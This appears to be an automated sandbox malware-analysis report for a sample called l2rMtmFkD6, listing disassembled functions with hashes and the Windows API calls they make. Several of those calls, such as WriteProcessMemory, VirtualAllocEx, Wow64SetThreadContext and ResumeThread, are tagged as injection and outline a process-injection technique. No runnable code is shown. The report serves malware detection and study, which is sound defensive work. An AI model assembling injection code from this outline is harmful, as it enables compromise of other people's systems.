                        • API String ID: 963392458-0
                        • Opcode ID: 9d5135ad66f62224c434f63d556b97e828e14468a7a01d15e1bbf85bf17ab828
                        • Instruction ID: 16d0b676936f1ee16eb63cf868f62213afda4dc237f5daec37547b1ea25cff70
                        • Opcode Fuzzy Hash: 9d5135ad66f62224c434f63d556b97e828e14468a7a01d15e1bbf85bf17ab828
                        • Instruction Fuzzy Hash: 55913B71D006199FDB24CFA8CC45BEDBBB3BF48314F148969D809A7290DB749A85CF92
                        Function 00CB590D Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 602 cb590d-cb59d9 CreateActCtxA 604 cb59db-cb59e1 602->604 605 cb59e2-cb5a3c 602->605 604->605 612 cb5a4b-cb5a4f 605->612 613 cb5a3e-cb5a41 605->613 614 cb5a51-cb5a5d 612->614 615 cb5a60 612->615 613->612 614->615 617 cb5a61 615->617 617->617
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00CB59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 401dd8bd225aed9195febb500c9be5e1b156d235a9b3934417e063d0be2945d0
                        • Instruction ID: bd5e7d22e77fc400997127e786c023d8b487391d73e16505f7213b7713de5a7a
                        • Opcode Fuzzy Hash: 401dd8bd225aed9195febb500c9be5e1b156d235a9b3934417e063d0be2945d0
                        • Instruction Fuzzy Hash: 9441F2B1C00619CFDB24CFA9C884BDDBBB6FF49304F20815AD408AB251DB75A94ACF91
                        Function 00CB44E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 618 cb44e0-cb59d9 CreateActCtxA 621 cb59db-cb59e1 618->621 622 cb59e2-cb5a3c 618->622 621->622 629 cb5a4b-cb5a4f 622->629 630 cb5a3e-cb5a41 622->630 631 cb5a51-cb5a5d 629->631 632 cb5a60 629->632 630->629 631->632 634 cb5a61 632->634 634->634
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00CB59C9
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5c6e78d8c7981ff72477efb98bdf152d6f0c252fd68f680f907a8a7a473b6d3a
                        • Instruction ID: 14ebaace5487526bc97539c03e3f31a508d8a07a0996ec03d46ac65752ca2ce4
                        • Opcode Fuzzy Hash: 5c6e78d8c7981ff72477efb98bdf152d6f0c252fd68f680f907a8a7a473b6d3a
                        • Instruction Fuzzy Hash: 5A41E2B1C00719CBDB24DFA9C884BDEBBF5BF48304F20805AD408AB251DB71A946CF91
                        Function 05C4A7C8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 635 5c4a7c8-5c4a81e 638 5c4a820-5c4a82c 635->638 639 5c4a82e-5c4a86d WriteProcessMemory 635->639 638->639 641 5c4a876-5c4a8a6 639->641 642 5c4a86f-5c4a875 639->642 642->641
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A860
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: df735c8f3fa883747f8d7f695e09e2c611d1f876345e9015b45b1a7bdd1896b3
                        • Instruction ID: d868096613c402fe520d5ddb0be94fe35cb92077bea53a02368af4cf768454b2
                        • Opcode Fuzzy Hash: df735c8f3fa883747f8d7f695e09e2c611d1f876345e9015b45b1a7bdd1896b3
                        • Instruction Fuzzy Hash: 592146B6D003199FCB10CFA9C885BEEBBF5FF48310F10842AE919A7240D7789945CBA1
                        Function 05C4A7D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 646 5c4a7d0-5c4a81e 648 5c4a820-5c4a82c 646->648 649 5c4a82e-5c4a86d WriteProcessMemory 646->649 648->649 651 5c4a876-5c4a8a6 649->651 652 5c4a86f-5c4a875 649->652 652->651
                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C4A860
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 425a8d4a7101062a38da3ea10d6e685dc1f1e1dd7788acc90e403a6999dabc1c
                        • Instruction ID: 716892d39bb901a6b9fa83a05913798413c67a917e149733226803142d4e0630
                        • Opcode Fuzzy Hash: 425a8d4a7101062a38da3ea10d6e685dc1f1e1dd7788acc90e403a6999dabc1c
                        • Instruction Fuzzy Hash: C42126B5D003099FCB10DFA9C885BDEBBF5FF48310F108429E919A7240D7789945CBA1
                        Function 05C4A631 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 656 5c4a631-5c4a683 659 5c4a685-5c4a691 656->659 660 5c4a693-5c4a6c3 Wow64SetThreadContext 656->660 659->660 662 5c4a6c5-5c4a6cb 660->662 663 5c4a6cc-5c4a6fc 660->663 662->663
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05C4A6B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 9fea6c9403cba5ce0b1f0405b205bbbf17966e79232900dd00b8b3867ca1b1b7
                        • Instruction ID: 41ca156c711bca22025d7558ce281b6086b718d7f5887c7cef5dadfadd742293
                        • Opcode Fuzzy Hash: 9fea6c9403cba5ce0b1f0405b205bbbf17966e79232900dd00b8b3867ca1b1b7
                        • Instruction Fuzzy Hash: 102159B1D002098FCB10DFAAC885BEEBFF5FB88314F108429D419A7240C7789945CFA1
                        Function 05C4A8B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4A940
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 1bb33e97787670a7de0189c0f3e43b5f66027c232eba42a3872529ed3c27f0d5
                        • Instruction ID: 9eb88fbaa8d1b03d9a1f0a2a9552ce0264fbd63a812773685f4b0d12b099bf7c
                        • Opcode Fuzzy Hash: 1bb33e97787670a7de0189c0f3e43b5f66027c232eba42a3872529ed3c27f0d5
                        • Instruction Fuzzy Hash: C82148B2C003199FCB10CFAAC881AEEFBF5FF48320F508429E519A7240C7389941DBA1
                        Function 05C4A638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                        Download Yara Rule
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05C4A6B6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: 95fc59f7445e1a63f9ca605cb0691e4f011151815eb1781c9ab3733dbdc2bd68
                        • Instruction ID: 7124556dd49d2564ca69c361939c5901cdcb218a696c7c2594fa1e977a4b6f71
                        • Opcode Fuzzy Hash: 95fc59f7445e1a63f9ca605cb0691e4f011151815eb1781c9ab3733dbdc2bd68
                        • Instruction Fuzzy Hash: F42107B1D002098FDB10DFAAC885BEEBBF5AB88324F548429D419A7240D7789945CFA5
                        Function 05C4A8C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                        Download Yara Rule
                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C4A940
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 5cf12bb3df264b8f6dd8195eac08bf61196ba9f90a6063ca8fef0d7495c47c2e
                        • Instruction ID: 2d4f10020360be0a9bcd97caa35d9cb370a1a32d473cbefe86e7e5dfc380678d
                        • Opcode Fuzzy Hash: 5cf12bb3df264b8f6dd8195eac08bf61196ba9f90a6063ca8fef0d7495c47c2e
                        • Instruction Fuzzy Hash: 012128B1D003499FCB10DFAAC845ADEFBF5FF48320F508429E519A7240C7389941DBA5
                        Function 00CBD608 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00CBD68F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 315bff6bc64e4786ae432c01e7141cf92f2f33d8e4bf94cdfa0d1c558fdd53e1
                        • Instruction ID: 1da7b7b82bede1ae4486000de296374225b8047e3f5f22873dcab282b4957bd1
                        • Opcode Fuzzy Hash: 315bff6bc64e4786ae432c01e7141cf92f2f33d8e4bf94cdfa0d1c558fdd53e1
                        • Instruction Fuzzy Hash: 0D21C4B5D002499FDB10CF9AD984ADEBFF8FB48310F14841AE959A3350D378A954CFA5
                        Function 00CBAB30 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00CBB401,00000800,00000000,00000000), ref: 00CBB612
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: fc1f11d271faa9d5800874609bc7c33b46833008965a063cd6d31a9a54a09383
                        • Instruction ID: d84d94bf336fbfd5dae3e5a910863f327c4d9b28b41c1a6faa8c8b54341eca72
                        • Opcode Fuzzy Hash: fc1f11d271faa9d5800874609bc7c33b46833008965a063cd6d31a9a54a09383
                        • Instruction Fuzzy Hash: DA1126B6D003499FDB10CF9AC844ADEFBF4EB48310F14842EE429A7200C3B5A945CFA5
                        Function 05C4A708 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A77E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 242255bb5298385b5689cc699b5bfa65f983b2179c905a0ffea597425864a744
                        • Instruction ID: f79b27e1e2a9b7680c0881f3c911ed75ed50022bf47626fd53192a67be253773
                        • Opcode Fuzzy Hash: 242255bb5298385b5689cc699b5bfa65f983b2179c905a0ffea597425864a744
                        • Instruction Fuzzy Hash: B1111775D002498FDB20DFA9D845ADEBFF6FB88324F248419E519A7250C7399941CFA1
                        Function 05C4A710 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C4A77E
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: addd41015fa9a99afe1096e9ef8dc61fb412cc080204732b0dfdf3e88267d329
                        • Instruction ID: 9fb555c17c5bc1074912d7e1b01d0596e27f01f9bacfc1753926d75a1f11965c
                        • Opcode Fuzzy Hash: addd41015fa9a99afe1096e9ef8dc61fb412cc080204732b0dfdf3e88267d329
                        • Instruction Fuzzy Hash: 41112975D002499FDB10DFA9C845ADFBFF5EB88324F208419D519A7250C7759541CFA1
                        Function 05C4A588 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: ef2e59872c9b9d23059db6bb8ccb67df67d50745a61cdbab0b6811ee4ccab0ce
                        • Instruction ID: 8b09b7d9cd4955e34c60b65501d22378e7f8cea19398dcbff8ff4a07753911ef
                        • Opcode Fuzzy Hash: ef2e59872c9b9d23059db6bb8ccb67df67d50745a61cdbab0b6811ee4ccab0ce
                        • Instruction Fuzzy Hash: 3C1128B1D042498BDB10DFAAC845BDEFBF9AB88324F208419D419A7240C775A945CFA5
                        Function 00CBB320 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00CBB386
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098253452.0000000000CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cb0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 7145e15d458d15dc8fc795f45d4a00af4c5001d92c1d420aa1a6008d51d3e9cc
                        • Instruction ID: 43141d64dc8efe87af45a116d60eafed1461ca473388a7c649645052e58212a5
                        • Opcode Fuzzy Hash: 7145e15d458d15dc8fc795f45d4a00af4c5001d92c1d420aa1a6008d51d3e9cc
                        • Instruction Fuzzy Hash: 0B11E3B5C003498FCB10DF9AD544ADEFBF4EB88320F15841AD429B7210D3B5A945CFA1
                        Function 05C4A587 Relevance: 1.5, APIs: 1, Instructions: 47threadCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: c6f7be2367a6f3562d22f4bf5777e1f08f88e13c9f12852a37963201699c0666
                        • Instruction ID: b1bf6edeb43e8d8eab8a6ffa41a5c47c1c0e3fbf1d5ea025399f4575fd76f7a8
                        • Opcode Fuzzy Hash: c6f7be2367a6f3562d22f4bf5777e1f08f88e13c9f12852a37963201699c0666
                        • Instruction Fuzzy Hash: C91148B5D003498FDB10DFAAC9457EEFBF5AF88324F24881AC419A7240C738A945CFA5
                        Function 05C4F1D8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05C4F23D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 802abfba6820c613a84756202b5819cdcad699b53e591729eea41a7a59bfe2e0
                        • Instruction ID: e9ef10eb3777473879c923f1379ba7df3f41d71fe670c0df8dd1a2dedb480d91
                        • Opcode Fuzzy Hash: 802abfba6820c613a84756202b5819cdcad699b53e591729eea41a7a59bfe2e0
                        • Instruction Fuzzy Hash: C411F5B58002499FCB10DF99D949BDEBFF8FB48324F10841AD518A3200C375AA44CFA1
                        Function 05C4B958 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                        Download Yara Rule
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 05C4F23D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 917126f70d4f2ff979c8aefa3ff51d0cfddfaa92a131556d20d15956d9fc94c5
                        • Instruction ID: 228bf1479643561a8e9bed9d99b39222cb41d613bb21c6487ad36930b657f726
                        • Opcode Fuzzy Hash: 917126f70d4f2ff979c8aefa3ff51d0cfddfaa92a131556d20d15956d9fc94c5
                        • Instruction Fuzzy Hash: 2211F2B58003499FCB20DF9AD949BDEBBF8FB48320F108419E519A7300C375A944CFA1
                        Function 00C6D080 Relevance: .1, Instructions: 86COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098086682.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c6d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a36ad5a93707f093236bdc3cb6015cfe243b85cca427b589ad4d4428ce79d4d
                        • Instruction ID: 6739833a27e836325e18d1b5d92171fd2ace946848a83cf0c97521c2122905db
                        • Opcode Fuzzy Hash: 5a36ad5a93707f093236bdc3cb6015cfe243b85cca427b589ad4d4428ce79d4d
                        • Instruction Fuzzy Hash: C431A275909380CFD712CF24D594B15BF70AF46314F1886EED8898F2A3C33A991ACB92
                        Function 00C5D3D8 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098052235.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c5d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e0dc6339b42b11d14bda7cdb43a95e62412d199b4d9e16ee74bef20d5e97492
                        • Instruction ID: 32337fbc3645800056bb94632adeae671e5c3e7c53634d8092b95287d92aa334
                        • Opcode Fuzzy Hash: 4e0dc6339b42b11d14bda7cdb43a95e62412d199b4d9e16ee74bef20d5e97492
                        • Instruction Fuzzy Hash: 6C2136B9500300DFDB14DF04D9C0B26BF65FB94315F24C569EC0A0B256C336E89ACAA6
                        Function 00C6D0DC Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098086682.0000000000C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C6D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c6d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 23e221594360091e6b7014a5e1b1340de088eddd2e08b386f9c8206aa9e68bc9
                        • Instruction ID: ab87bf5f9b6852c71a2eb2e046f2503d1e13594d79286e1995fdc2d99b3d74c9
                        • Opcode Fuzzy Hash: 23e221594360091e6b7014a5e1b1340de088eddd2e08b386f9c8206aa9e68bc9
                        • Instruction Fuzzy Hash: A02107B1A04244DFDB14DF14D9C0B2ABB65FB85324F34C56DD90A4B356C37AD846CA61
                        Function 090E0AF0 Relevance: .1, Instructions: 62COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2105525158.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_90e0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 55982b48ce30d26f8ab0b8e28f88d2196c2e8d5d765b53b15dae518f635222bb
                        • Instruction ID: d94e8dbb23f9bf015485a14be6e8bcdabe9aebb8aad51cbb9b0089aff2d76c5c
                        • Opcode Fuzzy Hash: 55982b48ce30d26f8ab0b8e28f88d2196c2e8d5d765b53b15dae518f635222bb
                        • Instruction Fuzzy Hash: 2C11D039A0D611CFD3604B29D81577A77F2FB01359F088967F0AAC7291CBB9E840CA95
                        Function 00C5D3D3 Relevance: .1, Instructions: 56COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2098052235.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c5d000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction ID: bb7d2f3645519a31007c7ed95feab8514041f5fc3bd5e5ee29a74a1d668e54fe
                        • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                        • Instruction Fuzzy Hash: DE11CD76404340CFDB16CF00D5C4B16BF62FB94324F24C2A9DC4A0A656C33AE99ACBA1
                        Function 090E0AE0 Relevance: .1, Instructions: 54COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2105525158.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_90e0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: da78eb2bc2a9d1fcf8105561f55975bf5c66f48bb4e51fc57cc62c8b61b28e3e
                        • Instruction ID: 9aecdb387e31137b8e22754d87471c8f714eeb7d145161fe16db9b32deef8f15
                        • Opcode Fuzzy Hash: da78eb2bc2a9d1fcf8105561f55975bf5c66f48bb4e51fc57cc62c8b61b28e3e
                        • Instruction Fuzzy Hash: CE11003960C211CFD3608E19E8147BA77F6FB80359F084922F02AC7295C7B9D841CB91

                        Non-executed Functions

                        Function 05C48688 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 922636b1f0f62d4add8fd2961a5e4b15edaf5e073b1b9593b2df045b84ac3701
                        • Instruction ID: eb3ec064399ab64e915e4104dd6d5fef24a6f3fe7e6c55ca7e0fdd723906cf41
                        • Opcode Fuzzy Hash: 922636b1f0f62d4add8fd2961a5e4b15edaf5e073b1b9593b2df045b84ac3701
                        • Instruction Fuzzy Hash: 1EE10AB4E045198FCB14DFA9C580AAEFBF2FF89304F248569E419AB355D730A941CFA1
                        Function 05C48250 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 65ec1b1985e5d0fee6aa51525638a46f99648766999a16d31e36d21339158f82
                        • Instruction ID: ef9105479c80947d18492246215a8a90773b8696349877976073ccb3739de7ec
                        • Opcode Fuzzy Hash: 65ec1b1985e5d0fee6aa51525638a46f99648766999a16d31e36d21339158f82
                        • Instruction Fuzzy Hash: 61E11AB4E042598FCB14DFA9C5809AEFBF2FF89304F248569E419AB355D730A941CFA1
                        Function 05C49D60 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 042860ca659441bd5961cb76bfd8e436e0470482f5251e89a7067332791a3d95
                        • Instruction ID: 62be644f8680002a0c908fb573f69a05cc491551bd81a03a8c900a92b54918a6
                        • Opcode Fuzzy Hash: 042860ca659441bd5961cb76bfd8e436e0470482f5251e89a7067332791a3d95
                        • Instruction Fuzzy Hash: AFE108B4E042198FCB14DFA9C5849AEFBF2FF89304F248569E419AB355D730A941CFA1
                        Function 05C47E18 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0de3006226130880e820d6f7d97e840d81f7a04feaab33fe3e975d40d4142c8c
                        • Instruction ID: 4323bc9b67cdc00b1f27b6665e9c7ddbde4aa6aa9672cf8375db3912784ff352
                        • Opcode Fuzzy Hash: 0de3006226130880e820d6f7d97e840d81f7a04feaab33fe3e975d40d4142c8c
                        • Instruction Fuzzy Hash: 57E11AB4E141198FCB14DFA9C5809AEFBF2FF88304F24856AE415AB355D730A942CFA1
                        Function 05C48AC0 Relevance: .3, Instructions: 312COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2102258749.0000000005C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5eb5e9d9252042c19e9a639632cca534682f19b23f21cd7fa1a0901ffc5e3ca5
                        • Instruction ID: c6508e2f2f019567d77c68dfd1bbc0d9ab9979ad1e2feec5fde9c136d023e484
                        • Opcode Fuzzy Hash: 5eb5e9d9252042c19e9a639632cca534682f19b23f21cd7fa1a0901ffc5e3ca5
                        • Instruction Fuzzy Hash: 90E1F8B4E042198FCB14DFA9C5809AEFBF2FF89304F248569D419AB355D730A941CFA1
                        Function 090E0BF0 Relevance: .3, Instructions: 292COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2105525158.00000000090E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_90e0000_l2rMtmFkD6.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07b0a8f749a7e80d41153d2b8fe3bd8c3d8fff277c04d5358ce4cd1226b8192b
